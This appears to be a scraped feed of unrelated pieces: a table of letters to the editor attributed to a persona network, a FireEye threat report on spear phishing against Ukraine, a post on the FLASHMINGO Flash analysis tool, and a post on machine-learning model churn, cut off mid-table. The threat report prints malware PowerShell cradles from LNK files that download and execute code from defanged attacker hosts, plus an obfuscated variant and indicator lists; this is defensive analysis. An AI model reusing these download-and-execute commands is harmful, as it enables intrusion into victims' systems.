Jan. 18, 2019

Jeremy Watte

Seattle

Seattle Times (seattletimes.com)

Title: “ISIS’ ideology not defeated”

The letter, written in response to an article about Americans killed by an ISIS suicide bomber in Syria, asserts that the Islamic extremist ideology espoused by the terrorist group remains undefeated.

https://www.seattletimes.com/opinion/letters-to-the-editor/isis-ideology-not-defeated/

March 1, 2019

Jeremy Watte

Baytown

The Baytown Sun (baytownsun.com)

Title: “Sins of Saudi Arabia”

The letter is condemnatory of Saudi Arabia, citing its actions in the Yemen conflict, the killing of Jamal Khashoggi, the killing of Zakaria al-Jaber, a Shiite child, in Medina, and the imprisonment of Saudi women activists. The letter also defends Iran, stating that it is not responsible for similar crimes.

http://baytownsun.com/opinion/article_4c8f1d4e-3bce-11e9-a391-37761ca39ef2.html

April 9, 2019

Mathew Obrien

Galveston

Galveston County’s The Daily News (galvnews.com)

Title: “Sanctioning Islamic corps is pure madness”

The letter condemns the Trump administration’s designation of the IRGC as a Foreign Terrorist Organization and claims that Trump is seeking to start a war with Iran.

https://www.galvnews.com/opinion/letters_to_editor/article_860e6c9b-1e22-5871-a1ea-d8d466fccc94.html

April 11, 2019

Matthew Obrien

Athens

Athens Daily Review (athensreview.com)

Title: “Trump, Bolton trying to start war with Iran”

The letter, similar to the April 9 letter published in Galveston County’s The Daily News, claims that Trump and Bolton are trying to start a war with Iran to use the war in Trump’s 2020 presidential campaign, while disregarding the alleged crimes of Saudi Arabia.

https://www.athensreview.com/opinion/letters_to_the_editor/trump-bolton-trying-to-start-war-with-iran/article_e41a029e-5ca5-11e9-b59b-4f174bf94dcd.html

April 11, 2019

Isabelle Kingsly

Newport News

Daily Press (dailypress.com)

Title: “An uneasy path – Re; Recent Iran sanction reports”

The letter also argues that Trump and Bolton are seeking to start a war with Iran toward political ends.

https://www.dailypress.com/news/opinion/letters/dp-edt-letsfri-0412-story.html

April 19, 2019

Jeremy Watte

Baytown

The Baytown Sun (baytownsun.com)

Title: “Escalating hostility toward Iran”

The letter argues that the election of Trump to the U.S. presidency has set the U.S. on a dangerous course and condemns the U.S. withdrawal from the Iran nuclear deal (JCPOA), stating that “the ayatollahs have welcomed this abrogation of honor on Trump’s part.”

http://baytownsun.com/opinion/article_fd3f8bfa-6249-11e9-992a-d373a2b5a5a4.html

April 23, 2019

Ed Sullivan

Galveston

Galveston County’s The Daily News (galvnews.com)

Title: “Escalating hostility toward Iran is wrong, dangerous”

The text of this letter is nearly identical to that authored by Jeremy Watte and published in The Baytown Sun on April 19, excepting changes made in several sentences.

https://www.galvnews.com/opinion/letters_to_editor/article_0409879b-fff9-5ab8-bbf5-a49a1c1592d9.html

Table 2: Sample letters published in news outlets submitted by personas in this network

Spear Phishing Campaign Targets Ukraine Government and Military; Infrastructure Reveals Potential Link to So-Called Luhansk People's Republic

16 April 2019 at 07:00

In early 2019, FireEye Threat Intelligence identified a spear phishing email targeting government entities in Ukraine. The spear phishing email included a malicious LNK file with PowerShell script to download the second-stage payload from the command and control (C&C) server. The email was received by military departments in Ukraine and included lure content related to the sale of demining machines. 

This latest activity is a continuation of spear phishing that targeted the Ukrainian Government as early as 2014. The email is linked to activity that previously targeted the Ukrainian Government with RATVERMIN. Infrastructure analysis indicates the actors behind the intrusion activity may be associated with the so-called Luhansk People's Republic (LPR).

The spear phishing email, sent on Jan. 22, 2019, used the subject "SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD," and the sender was forged as Armtrac, a defense manufacturer in the United Kingdom (Figure 1).


Figure 1: The spear phishing email

The email included an attachment with the filename "Armtrac-Commercial.7z" (MD5: 982565e80981ce13c48e0147fb271fe5). This 7z package contained "Armtrac-Commercial.zip" (MD5: e92d01d9b1a783a23477e182914b2454) with two benign Armtrac documents and one malicious LNK file with a substituted icon (Figure 2).


Figure 2: LNK with substituted icon

  • Armtrac-20T-with-Equipment-35078.pdf (MD5: 0d6a46eb0d0148aafb34e287fcafa68f) is a benign document from the official Armtrac website.
  • SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf (MD5: bace12f3be3d825c6339247f4bd73115) is a benign document from the official Armtrac website.
  • SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk (MD5: ec0fb9d17ec77ad05f9a69879327e2f9) is a malicious LNK file that executes a PowerShell script. Interestingly, while the LNK file used a forged extension to impersonate a PDF document, the icon was replaced with a Microsoft Word document icon.

Sponsor Potentially Active Since 2014

Compilation times indicate that this actor, who focused primarily on Ukraine, may have been active since at least 2014. Their activity was first reported by FireEye Threat Intelligence in early 2018. They gradually increased in sophistication and leveraged both custom and open-source malware.

The 2018 campaign used standalone EXE or self-extracting RAR (SFX) files to infect victims. However, their recent activity showed increased sophistication by leveraging malicious LNK files. The group used open-source QUASARRAT and the RATVERMIN malware, which we have not seen used by any other groups. Domain resolutions and malware compile times suggest this group may have been active as early as 2014. Filenames and malware distribution data suggest the group is primarily focused on targeting Ukrainian entities.

Association With So-Called Luhansk People's Republic

FireEye Threat Intelligence analysis uncovered several indications that the actors behind this activity have ties to the breakaway so-called Luhansk People's Republic (LPR).

Registrant Overlap with Official So-Called LPR Website

Infrastructure analysis suggests these operators are linked to the so-called LPR and the persona "re2a1er1." The domain used as C&C by the previous LNK file (sinoptik[.]website) was registered under the email "[email protected]." The email address also registered the following domains.

Domains Registered by [email protected]

Possible Mimicked Domains

Description

Possible Targeted Country

24ua[.]website

24tv.ua

A large news portal in Ukraine

UA

censor[.]website

censor.net.ua

A large news portal in Ukraine

UA

fakty[.]website

fakty.ua

A large news portal in Ukraine

UA

groysman[.]host

Volodymyr Borysovych Groysman

V. B. Groysman is a politician who has been the Prime Minister of Ukraine since April 14, 2016

UA

gordon.co[.]ua

gordonua.com

A large mail service in Ukraine

UA

mailukr[.]net

ukr.net

A large news portal in Ukraine

UA

me.co[.]ua

me.gov.ua

Ukraine's Ministry of Economic Development and Trade

UA

novaposhta[.]website

novaposhta.ua

Ukraine's largest logistics services company

UA

olx[.]website

olx.ua

Ukraine's largest online ad platform

UA

onlineua[.]website

online.ua

A large news portal in Ukraine

UA

rst[.]website

rst.ua

One of the largest car sales websites in Ukraine

UA

satv[.]pw

Unknown

TV-related

UA

sinoptik[.]website

sinoptik.ua

The largest weather website in Ukraine

UA

spectator[.]website

spectator.co.uk

A large news portal in the UK

UK

tv.co[.]ua

Unknown

TV-related

UA

uatoday[.]website

uatoday.news

A large news portal in Ukraine

UA

ukrposhta[.]website

ukrposhta.ua

State Post of Ukraine

UA

unian[.]pw

unian.net

A large news portal in Ukraine

Unknown

vj2[.]pw

Unknown

Unknown

UA

xn--90adzbis.xn--c1avg

Not Applicable

Punycode of Ministry of State Security of the So-Called Luhansk People’s Republic’s website

UA

z1k[.]pw

zik.ua

A large news portal in Ukraine

UA

milnews[.]info

Unknown

Military news

UA

Table 1: Related infrastructure

One of the domains, "xn--90adzbis.xn--c1avg" is a Punycode of "мгблнр.орг," which is the official website of the Ministry of State Security of the So-Called LPR (Figure 3). Ukraine legislation describes so-called LPR as "temporarily occupied territory" and its government as an "occupying administration of the Russian Federation."


Figure 3: Official website of the Ministry of State Security of the So-Called Luhansk People's Republic (МГБ ЛНР - Министерство Государственной Безопасности Луганской Народной Республики)

Conclusions

This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR's security service. While more evidence is needed for definitive attribution, this activity showcases the accessibility of competent cyber espionage capabilities, even to sub-state actors. While this specific group is primarily a threat to Ukraine, nascent threats to Ukraine have previously become international concerns and bear monitoring.

Technical Annex

The LNK file (SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk [MD5: ec0fb9d17ec77ad05f9a69879327e2f9]) included the following script (Figure 4) to execute a PowerShell script with Base64-encoded script:

vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e
""""aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4Ab
wBwAH QAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 :
window.close")

Figure 4: LNK file script

The following command (Figure 5) was received after decoding the Base64-encoded string:

vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e iex(iwr -useb
http://sinoptik[.]website/EuczSc)"", 0 : window.close")

Figure 5: LNK file command

The PowerShell script sends a request to URL "http://sinoptik[.]website/EuczSc." Unfortunately, the server was unreachable during analysis.

Network Infrastructure Linked to Attackers

The passive DNS records of the C&C domain "sinoptik[.]website" included the following IPs:

Host/Domain Name

First Seen

IP

sinoptik[.]website

2018-09-17

78.140.167.89

sinoptik[.]website

2018-06-08

78.140.164.221

sinoptik[.]website

2018-03-16

185.125.46.158

www.sinoptik[.]website

2019-01-17

78.140.167.89

Table 2: Network infrastructure linked to attackers

Domains previously connected to RATVERMIN (aka VERMIN) and QUASARRAT (aka QUASAR) also resolved to IP "185.125.46.158" and include the following:

Malware MD5

C&C

Malware Family

47161360b84388d1c254eb68ad3d6dfa

akamainet022[.]info

QUASARRAT

242f0ab53ac5d194af091296517ec10a

notifymail[.]ru

RATVERMIN

07633a79d28bb8b4ef8a6283b881be0e

akamainet066[.]info

QUASARRAT

5feae6cb9915c6378c4bb68740557d0a

akamainet024[.]info

RATVERMIN

dc0ab74129a4be18d823b71a54b0cab0

akamaicdn[.]ru

QUASARRAT

bbcce9c91489eef00b48841015bb36c1

cdnakamai[.]ru

QUASARRAT

Table 3: Additional malware linked to the attackers

RATVERMIN is a .NET backdoor that FireEye Threat Intelligence started tracking in March 2018. It has also been reported in public reports and blog posts.

Operators Highly Aggressive, Proactive

The actor is highly interactive with its tools and has responded within a couple of hours of receiving a new victim, demonstrating its ability to react quickly. An example of this hands-on style of operation occurred during live malware analysis. RATVERMIN operators observed that the malware was running from an unintended target at approximately 1700 GMT (12:00 PM Eastern Standard Time on a weekday) and promptly executed the publicly available Hidden Tear ransomware (saved to disk as hell0.exe, MD5: 8ff9bf73e23ce2c31e65874b34c54eac). The ransomware process was killed before it could execute successfully. If the Hidden Tear continued execution, a file would have been left on the desktop with the following message:

"Files have been encrypted with hidden tear. Send me some bitcoins or kebab. And I also hate night clubs, desserts, being drunk."

When live analysis resumed, the threat group behind the attack started deleting all the analysis tools on the machine. Upon resetting the machine and executing the malware again, this time with a text file open asking why they sent ransomware, the threat group responded by sending the following message via RATVERMIN's C&C domain (Figure 6):

C&C to Victim
HTTP/1.1 200 OK
Content-Length: 5203
Content-Type: multipart/related;
type="application/xop+xml";start="<http://tempuri[.]org/0>";boundary="uuid:67761605-
5c90-47ac-bcd8-
718a09548d60+id=14";start-info="application/soap+xml"
Server: Microsoft-HTTPAPI/2.0
MIME-Version: 1.0
Date: Tue, 20 Mar 2018 19:01:26 GMT
--uuid:67761605-5c90-47ac-bcd8-718a09548d60+id=14
Content-ID: <http://tempuri[.]org/0>
Content-Transfer-Encoding: 8bit
Content-Type: application/xop+xml;charset=utf-8;type="application/soap+xml"

<TRUNCATED>
Mad ?

Figure 6: RATVERMIN's C&C domain message

Related Samples

Further research uncovered additional LNK files with PowerShell scripts that connect to the same C&C server.

  • Filename: Висновки. S021000262_1901141812000. Scancopy_0003. HP LaserJet Enterprise 700 M775dn(CC522A).docx.lnk (Ukrainian translation: Conclusion)
    • MD5: fe198e90813c5ee1cfd95edce5241e25
    • Description: LNK file also has the substituted Microsoft Word document icon and sends a request to the same C&C domain
    • C&C: http://sinoptik[.]website/OxslV6

PowerShell activity (Command Line Arguments):
vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell.exe -c iex(iwr -useb
http://sinoptik[.]website/OxslV6)"", 0 : window.close")

Figure 7: Additional LNK files with PowerShell scripts

  • Filename: КМУ база даних.zip (Ukrainian translation: Cabinet of Ministers of Ukraine database)
    • MD5: a5300dc3e19f0f0b919de5cda4aeb71c
    • Description: ZIP archive containing a malicious LNK file
  • Filename: Додаток.pdf (Ukrainian translation: Addition)
    • MD5: a40fb835a54925aea12ffaa0d76f4ca7
    • Description: Benign decoy document
  • Filename: КМУ_база_даних_органи_упр,_СГ_КМУ.rtf.lnk
    • MD5: 4b8aac0649c3a846c24f93dc670bb1ef
    • Description: Malicious LNK that executes a PowerShell script
    • C&C: http://cdn1186[.]site/zG4roJ

powershell.exe
-NoP -NonI -W hidden -Com "$cx=New-Object -ComObject
MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186[.]site/zG4roJ',$False);$cx.Send();
$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')"
!%SystemRoot%\system32\shell32.dll

Figure 8: Additional LNK files with PowerShell scripts

FireEye Detection

FireEye detection names for the indicators in the attack include the following:

FireEye Endpoint Security

  • INVOKE CRADLECRAFTER (UTILITY)
  • MALICIOUS SCRIPT CONTENT A (METHODOLOGY)
  • MSHTA.EXE SUSPICIOUS COMMAND LINE SCRIPTING (METHODOLOGY)
  • OFFICE CLIENT SUSPICIOUS CHILD PROCESS (METHODOLOGY)
  • PERSISTENT MSHTA.EXE PROCESS EXECUTION (METHODOLOGY)
  • POWERSHELL.EXE EXECUTION ARGUMENT OBFUSCATION (METHODOLOGY)
  • POWERSHELL.EXE IEX ENCODED COMMAND (METHODOLOGY)
  • SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)

FireEye Network Security

  • 86300142_Backdoor.Win.QUASARRAT
  • 86300140_Backdoor.Win.QUASARRAT
  • 86300141_Backdoor.Win.QUASARRAT
  • Malware.archive
  • FE_Backdoor_MSIL_RATVERMIN_1
  • 33340392_Backdoor.Win.RATVERMIN
  • 33340391_Backdoor.Win.RATVERMIN

FireEye Email Security

  • FE_MSIL_Crypter
  • FE_Backdoor_MSIL_RATVERMIN_1
  • Malware.Binary.lnk
  • Malware.Binary.exe
  • Malware.archive
  • Backdoor.Win.QUASARRAT
  • Backdoor.Win.RATVERMIN
  • CustomPolicy.MVX.exe
  • CustomPolicy.MVX.65003.ExecutableDeliveredByEmail

Summary of Indicators

Malicious package and LNK files

  • 982565e80981ce13c48e0147fb271fe5
  • e92d01d9b1a783a23477e182914b2454
  • ec0fb9d17ec77ad05f9a69879327e2f9
  • fe198e90813c5ee1cfd95edce5241e25
  • a5300dc3e19f0f0b919de5cda4aeb71c
  • 4b8aac0649c3a846c24f93dc670bb1ef

Related File

  • 0d6a46eb0d0148aafb34e287fcafa68f (decoy document)
  • bace12f3be3d825c6339247f4bd73115 (decoy document)
  • a40fb835a54925aea12ffaa0d76f4ca7 (decoy document)

Quasar RAT Samples

  • 50b1f0391995a0ce5c2d937e880b93ee
  • 47161360b84388d1c254eb68ad3d6dfa
  • 07633a79d28bb8b4ef8a6283b881be0e
  • dc0ab74129a4be18d823b71a54b0cab0
  • bbcce9c91489eef00b48841015bb36c1
  • 3ddc543facdc43dc5b1bdfa110fcffa3
  • 5b5060ebb405140f87a1bb65e06c9e29
  • 80b3d1c12fb6aaedc59ce4323b0850fe
  • d2c6e6b0fbe37685ddb865cf6b523d8c
  • dc0ab74129a4be18d823b71a54b0cab0
  • dca799ab332b1d6b599d909e17d2574c

RATVERMIN

  • 242f0ab53ac5d194af091296517ec10a
  • 5feae6cb9915c6378c4bb68740557d0a
  • 5e974179f8ef661a64d8351e6df53104
  • 0b85887358fb335ad0dd7ccbc2d64bb4
  • 9f88187d774cc9eaf89dc65479c4302d
  • 632d08020499a6b5ee4852ecadc79f2e
  • 47cfac75d2158bf513bcd1ed5e3dd58c
  • 8d8a84790c774adf4c677d2238999eb5
  • 860b8735995df9e2de2126d3b8978dbf
  • 987826a19f7789912015bb2e9297f38b
  • a012aa7f0863afbb7947b47bbaba642e
  • a6ecfb897ca270dd3516992386349123
  • 7e2f581f61b9c7c71518fea601d3eeb3
  • b5a6aef6286dd4222c74257d2f44c4a5
  • 0f34508772ac35b9ca8120173c14d5f0 (RATVERMIN's keylogger)
  • 86d2493a14376fbc007a55295ef93500 (RATVERMIN's encryption tool)
  • 04f1aa35525a44dcaf51d8790d1ca8a0 (RATVERMIN helper functions)
  • 634d2a8181d08d5233ca696bb5a9070d (RATVERMIN helper functions)
  • d20ec4fdfc7bbf5356b0646e855eb250 (RATVERMIN helper functions)
  • 5ba785aeb20218ec89175f8aaf2e5809 (RATVERMIN helper functions)
  • b2cf610ba67edabb62ef956b5e177d3a (RATVERMIN helper functions)
  • 7e30836458eaad48bf57dc1decc27d09 (RATVERMIN helper functions)
  • df3e16f200eceeade184d6310a24c3f4 (RATVERMIN crypt functions)
  • 86d2493a14376fbc007a55295ef93500 (RATVERMIN crypt functions)
  • d72448fd432f945bbccc39633757f254 (RATVERMIN task scheduler tool)
  • e8e954e4b01e93f10cefd57fce76de25 (RATVERMIN task scheduler tool)

Hidden Tear Ransomware

  • 8ff9bf73e23ce2c31e65874b34c54eac

Malicious Infrastructure

  • akamainet022[.]info
  • akamainet066[.]info
  • akamainet024[.]info
  • akamainet023[.]info
  • akamainet066[.]info
  • akamainet021[.]info
  • www.akamainet066[.]info
  • www.akamainet023[.]info
  • www.akamainet022[.]info
  • www.akamainet021[.]info
  • akamaicdn[.]ru
  • cdnakamai[.]ru
  • mailukr[.]net
  • notifymail[.]ru
  • www.notifymail[.]ru
  • tech-adobe.dyndns[.]biz
  • sinoptik[.]website
  • cdn1186[.]site
  • news24ua[.]info
  • http://sinoptik[.]website/EuczSc
  • http://sinoptik[.]website/OxslV6
  • http://cdn1186[.]site/zG4roJ
  • 206.54.179.196
  • 195.78.105.23
  • 185.125.46.24
  • 185.158.153.222
  • 188.227.16.73
  • 212.116.121.46
  • 185.125.46.158
  • 94.158.46.251
  • 188.227.75.189

Correlated Infrastructure

FLASHMINGO: The FireEye Open Source Automatic Analysis Tool for Flash

15 April 2019 at 15:00

Adobe Flash is one of the most exploited software components of the last decade. Its complexity and ubiquity make it an obvious target for attackers. Public sources list more than one thousand CVEs being assigned to the Flash Player alone since 2005. Almost nine hundred of these vulnerabilities have a Common Vulnerability Scoring System (CVSS) score of nine or higher.

After more than a decade of playing cat and mouse with the attackers, Adobe is finally deprecating Flash in 2020. To the security community this move is not a surprise since all major browsers have already dropped support for Flash.

A common misconception exists that Flash is already a thing of the past; however, history has shown us that legacy technologies linger for quite a long time. If organizations do not phase Flash out in time, the security threat may grow beyond Flash's end of life due to a lack of security patches.

As malware analysts on the FLARE team, we still see Flash exploits within malware samples. We must find a compromise between the need to analyse Flash samples and the correct amount of resources to be spent on a declining product. To this end we developed FLASHMINGO, a framework to automate the analysis of SWF files. FLASHMINGO enables analysts to triage suspicious Flash samples and investigate them further with minimal effort. It integrates into various analysis workflows as a stand-alone application or can be used as a powerful library. Users can easily extend the tool's functionality via custom Python plug-ins.

Background: SWF and ActionScript3

Before we dive into the inner workings of FLASHMINGO, let’s learn about the Flash architecture. Flash’s SWF files are composed of chunks, called tags, implementing a specific functionality. Tags are completely independent from each other, allowing for compatibility with older versions of Flash. If a tag is not supported, the software simply ignores it. The main source of security issues revolves around SWF’s scripting language: ActionScript3 (AS3). This scripting language is compiled into bytecode and placed within a Do ActionScript ByteCode (DoABC) tag. If a SWF file contains a DoABC tag, the bytecode is extracted and executed by a proprietary stack-based virtual machine (VM), known as AVM2 in the case of AS3, shipped within Adobe’s Flash player. The design of the AVM2 was based on the Java VM and was similarly plagued by memory corruption and logical issues that allowed malicious AS3 bytecode to execute native code in the context of the Flash player. In the few cases where the root cause of past vulnerabilities was not in the AVM2, ActionScript code was still necessary to put the system in a state suitable for reliable exploitation. For example, by grooming the heap before triggering a memory corruption. For these reasons, FLASHMINGO focuses on the analysis of AS3 bytecode.

Tool Architecture

FLASHMINGO leverages the open source SWIFFAS library to do the heavy lifting of parsing Flash files. All binary data and bytecode are parsed and stored in a large object named SWFObject. This object contains all the information about the SWF relevant to our analysis: a list of tags, information about all methods, strings, constants and embedded binary data, to name a few. It is essentially a representation of the SWF file in an easily queryable format.

FLASHMINGO is a collection of plug-ins that operate on the SWFObject and extract interesting information. Figure 1 shows the relationship between FLASHMINGO, its plug-ins, and the SWFObject.


Figure 1: High level software structure

Several useful plug-ins covering a wide range of common analysis are already included with FLASHMINGO, including:

  • Find suspicious method names. Many samples contain method names used during development, like “run_shell” or “find_virtualprotect”. This plug-in flags samples with methods containing suspicious substrings.
  • Find suspicious constants. The presence of certain constant values in the bytecode may point to malicious or suspicious code. For example, code containing the constant value 0x5A4D may be shellcode searching for an MZ header.
  • Find suspicious loops. Malicious activity often happens within loops. This includes encoding, decoding, and heap spraying. This plug-in flags methods containing loops with interesting operations such as XOR or bitwise AND. It is a simple heuristic that effectively detects most encoding and decoding operations, and otherwise interesting code to further analyse.
  • Retrieve all embedded binary data.
  • A decompiler plug-in that uses the FFDEC Flash Decompiler. This decompiler engine, written in Java, can be used as a stand-alone library. Since FLASHMINGO is written in Python, using this plug-in requires Jython to interoperate between these two languages.

Extending FLASHMINGO With Your Own Plug-ins

FLASHMINGO is very easy to extend. Every plug-in is located in its own directory under the plug-ins directory. At start-up FLASHMINGO searches all plug-in directories for a manifest file (explained later in the post) and registers the plug-in if it is marked as active.

To accelerate development a template plug-in is provided. To add your own plug-in, copy the template directory, rename it, and edit its manifest and code. The template plug-in’s manifest, written in YAML, is shown below:

```
# This is a template for easy development
name: Template
active: no
description: copy this to kickstart development
returns: nothing

```

The most important parameters in this file are: name and active. The name parameter is used internally by FLASHMINGO to refer to it. The active parameter is a Boolean value (yes or no) indicating whether this plug-in should be active or not. By default, all plug-ins (except the template) are active, but there may be cases where a user would want to deactivate a plug-in. The parameters description and returns are simple strings to display documentation to the user. Finally, plug-in manifests are parsed once at program start. Adding new plug-ins or enabling/disabling plug-ins requires restarting FLASHMINGO.

Now for the actual code implementing the business logic. The file plugin.py contains a class named Plugin; the only thing that is needed is to implement its run method. Each plug-in receives an instance of a SWFObject as a parameter. The code will interact with this object and return data in a custom format, defined by the user. This way, the user's plug-ins can be written to produce data that can be directly ingested by their infrastructure.

Let's see how easy it is to create plug-ins by walking through one that is included, named binary_data. This plugin returns all embedded data in a SWF file by default. If the user specifies an optional parameter pattern then the plug-in searches for matches of that byte sequence within the embedded data, returning a dictionary of embedded data and the offset at which the pattern was found.

First, we define the optional argument pattern to be supplied by the user (line 2 and line 4):

Afterwards, implement a custom run method and all other code needed to support it:

This is a simple but useful plugin and illustrates how to interact with FLASHMINGO. The plug-in has a logging facility accessible through the property “ml” (line 2). By default it logs to FLASHMINGO’s main logger. If unspecified, it falls back to a log file within the plug-in’s directory. Line 10 to line 16 show the custom run method, extracting information from the SWF’s embedded data with the help of the custom _inspect_binary_data method. Note the source of this binary data: it is being read from a property named “swf”. This is the SWFObject passed to the plug-in as an argument, as mentioned previously. More complex analysis can be performed on the SWF file contents interacting with this swf object. Our repository contains documentation for all available methods of a SWFObject.

Conclusion

Even though Flash is set to reach its end of life at the end of 2020 and most of the development community has moved away from it a long time ago, we predict that we’ll see Flash being used as an infection vector for a while. Legacy technologies are juicy targets for attackers due to the lack of security updates. FLASHMINGO provides malware analysts a flexible framework to quickly deal with these pesky Flash samples without getting bogged down in the intricacies of the execution environment and file format.

Find the FLASHMINGO tool on the FireEye public GitHub Repository.

Churning Out Machine Learning Models: Handling Changes in Model Predictions

9 April 2019 at 17:00

Introduction

Machine learning (ML) is playing an increasingly important role in cyber security. Here at FireEye, we employ ML for a variety of tasks such as: antivirus, malicious PowerShell detection, and correlating threat actor behavior. While many people think that a data scientist’s job is finished when a model is built, the truth is that cyber threats constantly change and so must our models. The initial training is only the start of the process and ML model maintenance creates a large amount of technical debt. Google provides a helpful introduction to this topic in their paper “Machine Learning: The High-Interest Credit Card of Technical Debt.” A key concept from the paper is the principle of CACE: change anything, change everything. Because ML models deliberately find nonlinear dependencies between input data, small changes in our data can create cascading effects on model accuracy and downstream systems that consume those model predictions. This creates an inherent conflict in cyber security modeling: (1) we need to update models over time to adjust to current threats and (2) changing models can lead to unpredictable outcomes that we need to mitigate.

Ideally, when we update a model, the only change in model outputs are improvements, e.g. fixes to previous errors. Both false negatives (missing malicious activity) and false positives (alerts on benign activity), have significant impact and should be minimized. Since no ML model is perfect, we mitigate mistakes with orthogonal approaches: whitelists and blacklists, external intelligence feeds, rule-based systems, etc. Combining with other information also provides context for alerts that may not otherwise be present. However, CACE! These integrated systems can suffer unintended side effects from a model update. Even when the overall model accuracy has increased, individual changes in model output are not guaranteed to be improvements. Introduction of new false negatives or false positives in an updated model, called churn, creates the potential for new vulnerabilities and negative interactions with cyber security infrastructure that consumes model output. In this article, we discuss churn, how it creates technical debt when considering the larger cyber security product, and methods to reduce it.

Prediction Churn

Whenever we retrain our cyber security-focused ML models, we need to able to calculate and control for churn. Formally, prediction churn is defined as the expected percent difference between two different model predictions (note that prediction churn is not the same as customer churn, the loss of customers over time, which is the more common usage of the term in business analytics). It was originally defined by Cormier et al. for a variety of applications. For cyber security applications, we are often concerned with just those differences where the newer model performs worse than the older model. Let’s define bad churn when retraining a classifier as the percentage of misclassified samples in the test set which the original model correctly classified.

Churn is often a surprising and non-intuitive concept. After all, if the accuracy of our new model is better than the accuracy of our old model, what’s the problem? Consider the simple linear classification problem of malicious red squares and benign blue circles in Figure 1. The original model, A, makes three misclassifications while the newer model, B, makes only two errors. B is the more accurate model. Note, however, that B introduces a new mistake in the lower right corner, misclassifying a red square as benign. That square was correctly classified by model A and represents an instance of bad churn. Clearly, it’s possible to reduce the overall error rate while introducing a small number of new errors which did not exist in the older model.


Figure 1: Two linear classifiers with errors highlighted in orange. The original classifier A has lower accuracy than B. However, B introduces a new error in the bottom right corner.

Practically, churn introduces two problems in our models. First, bad churn may require changes to whitelist/blacklists used in conjunction with ML models. As we previously discussed, these are used to handle the small but inevitable number of incorrect classifications. Testing on large repositories of data is necessary to catch such changes and update associated whitelists and blacklists. Second, churn may create issues for other ML models or rule-based systems which rely on the output of the ML model. For example, consider a hypothetical system which evaluates URLs using both a ML model and a noisy blacklist. The system generates an alert if

  • P(URL = ‘malicious’) > 0.9 or
  • P(URL = ‘malicious’) > 0.5 and the URL is on the blacklist

After retraining, the distribution of P(URL=‘malicious’) changes and all .com domains receive a higher score. The alert rules may need to be readjusted to maintain the required overall accuracy of the combined system. Ultimately, finding ways of reducing churn minimizes this kind of technical debt.

Experimental Setup

We’re going to explore churn and churn reduction techniques using EMBER, an open source malware classification data set. It consists of 1.1 million PE files first seen in 2017, along with their labels and features. The objective is to classify the files as either goodware or malware. For our purposes we need to construct not one model, but two, in order to calculate the churn between models. We have split the data set into three pieces:

  1. January through August is used as training data
  2. September and October are used to simulate running the model in production and retraining (test 1 in Figure 2).
  3. November and December are used to evaluate the models from step 1 and 2 (test 2 in Figure 2).


Figure 2: A comparison of our experimental setup versus the original EMBER data split. EMBER has a ten-month training set and a two-month test set. Our setup splits the data into three sets to simulate model training, then retraining while keeping an independent data set for final evaluation.

Figure 2 shows our data split and how it compares to the original EMBER data split. We have built a LightGBM classifier on the training data, which we’ll refer to as the baseline model. To simulate production testing, we run the baseline model on test 1 and record the FPs and FNs. Then, we retrain our model using both the training data and the FPs/FNs from test 1. We’ll refer to this model as the standard retrain. This is a reasonably realistic simulation of actual production data collection and model retraining. Finally, both the baseline model and the standard retrain are evaluated on test 2. The standard retrain has a higher accuracy than the baseline on test 2, 99.33% vs 99.10% respectively. However, there are 246 misclassifications made by the retrain model that were not made by the baseline or 0.12% bad churn.

Incremental Learning

Since our rationale for retraining is that cyber security threats change over time, e.g. concept drift, it’s a natural suggestion to use techniques like incremental learning to handle retraining. In incremental learning we take new data to learn new concepts without forgetting (all) previously learned concepts. That also suggests that an incrementally trained model may not have as much churn, as the concepts learned in the baseline model still exist in the new model. Not all ML models support incremental learning, but linear and logistic regression, neural networks, and some decision trees do. Other ML models can be modified to implement incremental learning. For our experiment, we incrementally trained the baseline LightGBM model by augmenting the training data with FPs and FNs from test 1 and then trained an additional 100 trees on top of the baseline model (for a total of 1,100 trees). Unlike the baseline model we use regularization (L2 parameter of 1.0); using no regularization resulted in overfitting to the new points. The incremental model has a bad churn of 0.05% (113 samples total) and 99.34% accuracy on test 2. Another interesting metric is the model’s performance on the new training data; how many of the baseline FPs and FNs from test 1 does the new model fix? The incrementally trained model correctly classifies 84% of the previous incorrect classifications. In a very broad sense, incrementally training on a previous model’s mistake provides a “patch” for the “bugs” of the old model.

Churn-Aware Learning

Incremental approaches only work if the features of the original and new model are identical. If new features are added, say to improve model accuracy, then alternative methods are required. If what we desire is both accuracy and low churn, then the most straightforward solution is to include both of these requirements when training. That’s the approach taken by Cormier et al., where samples received different weights during training in such a way as to minimize churn. We have made a few deviations in our approach: (1) we are interested in reducing bad churn (churn involving new misclassifications) as opposed to all churn and (2) we would like to avoid the extreme memory requirements of the original method. In a similar manner to Cormier et al., we want to reduce the weight, e.g. importance, of previously misclassified samples during training of a new model. Practically, the model sees making the same mistakes as the previous model as cheaper than making a new mistake. Our weighing scheme gives all samples correctly classified by the original model a weight of one and all other samples have a weight of: w = α – β |0.5 – Pold (χi)|, where Pold (χi) is the output of the old model on sample χi and αβ are adjustable hyperparameters. We train this reduced churn operator model (RCOP) using an α of 0.9, a β of 0.6 and the same training data as the incremental model. RCOP produces 0.09% bad churn, 99.38% accuracy on test 2.

Results

Figure 3 shows both accuracy and bad churn of each model on test set 2. We compare the baseline model, the standard model retrain, the incrementally learned model and the RCOP model.


Figure 3: Bad churn versus accuracy on test set 2.

Table 1 summarizes each of these approaches, discussed in detail above.

Name

Trained on

Method

Total # of trees

Baseline

train

LightGBM

1000

Standard retrain

train + FPs/FNs from baseline on test 1

LightGBM

1100

Incremental model

train + FPs/FNs from baseline on test 1

Trained 100 new trees, starting from the baseline model

1100

RCOP

train + FPs/FNs from baseline on test 1

